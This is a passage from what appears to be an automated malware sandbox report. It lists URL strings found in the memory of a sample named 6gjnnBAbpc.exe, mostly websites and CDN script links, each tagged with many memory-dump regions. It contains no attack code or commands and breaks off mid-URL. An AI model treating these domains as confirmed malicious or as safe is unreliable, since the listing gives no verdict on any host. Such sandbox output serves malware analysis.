00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.webeasy.com.hk
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/MP
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/aP1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg3.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg4.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg6.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/To9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.332833174.0000000008DC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwww.wifi4all.nl/2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chimpstatic.com/mcjs-connected/js/users/4c8ec8296850930fd1c281270/48b88329c63ed7575f5b4b054.
